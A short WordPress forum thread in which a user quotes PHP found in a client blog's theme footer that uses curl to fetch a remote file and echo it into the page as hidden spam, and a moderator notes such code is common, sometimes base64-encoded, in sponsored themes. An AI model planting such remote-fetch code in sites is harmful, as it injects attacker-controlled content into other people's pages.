WordPress.org

1. TomJohnson
   Member
   Posted 3 years ago #

   I looked in the footer of a blog I installed for a client and saw this code:

   <? php $url = "http://select-your-mortgage.com/file.txt";
   $ch = curl_init();
   curl_setopt($ch, CURLOPT_URL, $url);
   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
   echo $result = curl_exec($ch);
   curl_close($ch);

   ?>

   There wasn't any visible spam on the page, but when I viewed the source, there was tons of it. Is that some kind of hidden spam attack?

2. mrmist
   Forum Janitor
   Posted 3 years ago #

   Using curl seems to be gaining popularity in sponsored theme footers, unforunately. Some folk have even taken to encoding the curl stuff in base64, too. Which to me is very thinly vailed hacking.

3. TomJohnson
   Member
   Posted 3 years ago #

   Thanks mrmist for the reply and insight.

Topic Closed

This topic has been closed to new replies.